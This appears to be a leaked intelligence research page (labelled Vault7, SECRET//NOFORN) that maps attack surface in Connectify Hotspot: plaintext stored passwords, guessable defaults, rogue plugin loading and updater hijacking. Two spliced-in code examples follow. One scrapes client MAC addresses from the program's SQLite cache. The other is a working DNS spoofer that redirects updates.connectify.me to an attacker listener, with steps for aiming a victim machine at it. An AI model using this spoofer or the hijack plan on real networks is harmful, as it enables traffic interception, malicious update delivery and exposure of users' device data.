Vault7: CIA Hacking Tools Revealed
Owner: User #7995631
ConnectifyMe Research
SECRET//NOFORN
Connectify Hotspot Version: 2015.0.5.34877
Associated processes before creating a wireless network:
Process Name | DEP | ASLR | Ports | Notes |
---|---|---|---|---|
Connectify.exe | N | | TCP:2987; UDP connections come and go on different addresses | |
Connectifyd.exe | Y | | | |
ConnectifyService.exe | Y | | | |
ConnectifyNetServices.exe | | | | Showed up when starting a hotspot but then ends. |
Associated processes after creating a wireless network:
Process Name | DEP | ASLR | Ports | Notes |
---|---|---|---|---|
Connectify.exe | N | | TCP:2987; UDP connections come and go on different addresses | |
Connectifyd.exe | Y | | | |
ConnectifyService.exe | Y | | | |
ConnectifyNetServices.exe | | | TCP:53 (DNS), TCP:6789 (unknown) | Showed up when starting a hotspot but then ends. |
Program data:
Settings are stored in C:\ProgramData\Connectify\
C:\ProgramData\Connectify\cache\natstats.sqlite has tables about connected clients, including their MAC addresses
Google Analytics: I'm not 100% sure what this is, but they seem to be giving Google some information on usage. Maybe FISA collect on this?
DHCP logs in C:\ProgramData\Connectify\logs\ConnectifyNetServices<Date yyyy-mm-dd>.log
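Added example (not from these notes, and not Connectify code): a Python triage script that enumerates the tables in an SQLite file from sqlite_master and pulls out every value that looks like a MAC address, so natstats.sqlite can be dumped before its schema is known. The file is opened read-only so the evidence copy is never modified. The `clients` table built in memory is a constructed stand-in; the real table and column names in natstats.sqlite are not recorded here.

```python
import re
import sqlite3

# Matches colon- or dash-separated MAC addresses anywhere in a text cell.
MAC_RE = re.compile(r"\b(?:[0-9A-Fa-f]{2}[:-]){5}[0-9A-Fa-f]{2}\b")

def open_db(path):
    """Open an SQLite file read-only so triage never writes to the evidence copy."""
    return sqlite3.connect(f"file:{path}?mode=ro", uri=True)

def list_schema(conn):
    """Return {table: [column, ...]} for every user table, read from sqlite_master."""
    schema = {}
    for (name,) in conn.execute("SELECT name FROM sqlite_master WHERE type='table'"):
        schema[name] = [row[1] for row in conn.execute(f'PRAGMA table_info("{name}")')]
    return schema

def find_mac_addresses(conn):
    """Walk every row of every table; return (table, column, mac) for each MAC-looking value."""
    hits = []
    for table, cols in list_schema(conn).items():
        for row in conn.execute(f'SELECT * FROM "{table}"'):
            for col, val in zip(cols, row):
                if isinstance(val, str):
                    for m in MAC_RE.finditer(val):
                        hits.append((table, col, m.group(0).upper()))
    return hits

def build_sample_db():
    """Constructed stand-in for natstats.sqlite; the real schema is not recorded in the notes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE clients (hostname TEXT, mac TEXT, ip TEXT)")
    conn.executemany("INSERT INTO clients VALUES (?, ?, ?)", [
        ("android-3f2a", "00:11:22:33:44:55", "192.168.137.10"),
        ("Johns-iPhone", "aa-bb-cc-dd-ee-ff", "192.168.137.11"),
        ("laptop", "not a mac", "192.168.137.12"),
    ])
    conn.commit()
    return conn

if __name__ == "__main__":
    import sys
    # Pass the path to natstats.sqlite; with no argument the constructed sample is used.
    conn = open_db(sys.argv[1]) if len(sys.argv) > 1 else build_sample_db()
    for table, cols in list_schema(conn).items():
        print(table, cols)
    for hit in find_mac_addresses(conn):
        print(*hit)
```

Run it against a copy of natstats.sqlite first; the schema dump tells you which table holds the client list, and the MAC scan confirms whether the addresses are stored as plain text or packed into a blob (the regex only sees TEXT cells).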
Defensive features:
It logs the DNS server IP addresses at the start of the hotspot. This helps it detect DNS hijacks.
Attack surface:
Wireless password:
The default wireless password follows a schema that would make a brute-force attack pretty easy.
It can show the plaintext password, which means it is stored in plaintext somewhere.
Plaintext password stored in C:\ProgramData\Connectify\settings\daemon
Program data (programs often treat their own config files as trusted input, but are they?)
Fuzz the config files in C:\ProgramData\Connectify and see if we can crash it.
Plugins (stored in C:\Program Files (x86)\Connectify\plugins\<Plugin Name>\<dll here>)
It seems to load plugins; can we make one for it? If it loads ours, what data can we get access to?
Automatic updater (calls out to updates.connectify.me)
How does this work? Does the updater run something? If so, does it check that what it is running is signed?
If we hijack DNS, what can we do?
Does this make any web requests? If so, can we inject an iframe into them?
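Added example (not from the notes, not Connectify code): a minimal DNS responder for a lab network that answers A queries for updates.connectify.me with an address we control and relays everything else to an upstream resolver, so the updater's traffic can be pointed at our own listener and its behaviour observed (HTTP or HTTPS, what it fetches, whether it runs what it fetched). The hostname is the one recorded above; the answer address 10.0.0.5, the bind address and the upstream resolver are assumptions. The query builder is included so the forged answer can be checked offline.

```python
import socket
import struct
import sys

# Names to hijack -> address to hand back. The name is from the notes; the address is an
# assumed lab listener, not anything observed.
SPOOFED = {"updates.connectify.me.": "10.0.0.5"}

def parse_qname(buf, off):
    """Read an uncompressed label sequence starting at off; return (name, next offset)."""
    labels = []
    while True:
        ln = buf[off]
        off += 1
        if ln == 0:
            break
        if ln & 0xC0:
            raise ValueError("compression pointer in question name")
        labels.append(buf[off:off + ln].decode("ascii"))
        off += ln
    return ".".join(labels).lower() + ".", off

def parse_query(buf):
    """Return (txid, name, qtype, qclass, raw question section) of a DNS query."""
    txid = struct.unpack("!H", buf[:2])[0]
    name, off = parse_qname(buf, 12)
    qtype, qclass = struct.unpack("!HH", buf[off:off + 4])
    return txid, name, qtype, qclass, buf[12:off + 4]

def build_query(name, txid=0x1234):
    """Build a standard recursive A/IN query, as a client such as the updater would send."""
    labels = name.rstrip(".").split(".")
    qname = b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"
    return struct.pack("!6H", txid, 0x0100, 1, 0, 0, 0) + qname + struct.pack("!HH", 1, 1)

def answer_for(query, table=SPOOFED, ttl=60):
    """If the query is an A/IN lookup for a hijacked name, build the forged response; else None."""
    txid, name, qtype, qclass, question = parse_query(query)
    ip = table.get(name)
    if ip is None or qtype != 1 or qclass != 1:
        return None
    # Flags 0x8180: response, recursion desired and available, no error; 1 question, 1 answer.
    header = struct.pack("!6H", txid, 0x8180, 1, 1, 0, 0)
    # Answer RR: pointer to the question name at offset 12 (0xC00C), type A, class IN, TTL, rdlength 4.
    answer = struct.pack("!HHHIH", 0xC00C, 1, 1, ttl, 4) + socket.inet_aton(ip)
    return header + question + answer

def answer_ip(response):
    """Extract the address from a single-answer A response (used to check what we send)."""
    _, off = parse_qname(response, 12)
    off += 4                    # qtype, qclass
    off += 2 + 2 + 2 + 4        # name pointer, type, class, ttl
    rdlength = struct.unpack("!H", response[off:off + 2])[0]
    return socket.inet_ntoa(response[off + 2:off + 2 + rdlength])

def serve(bind=("0.0.0.0", 53), upstream=None):
    """Answer hijacked names ourselves; relay everything else to upstream if one is given."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(bind)
    while True:
        data, client = sock.recvfrom(512)
        try:
            forged = answer_for(data)
        except (ValueError, IndexError, struct.error):
            continue
        if forged is not None:
            sock.sendto(forged, client)
        elif upstream:
            relay = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            relay.settimeout(2)
            try:
                relay.sendto(data, (upstream, 53))
                sock.sendto(relay.recv(4096), client)
            except socket.timeout:
                pass
            finally:
                relay.close()

if __name__ == "__main__":
    if "--serve" in sys.argv:
        serve(upstream="8.8.8.8")   # assumption: any working resolver; lab use only, needs port 53
    else:
        q = build_query("updates.connectify.me")
        print(answer_ip(answer_for(q)))
```

Point the victim VM's DNS at the box running this, then watch port 80/443 on the answer address: if the updater connects in the clear and executes what it receives without checking a signature, the DNS hijack alone is enough; if it uses HTTPS with a pinned or properly validated certificate, the hijack only yields a connection attempt and a failed handshake.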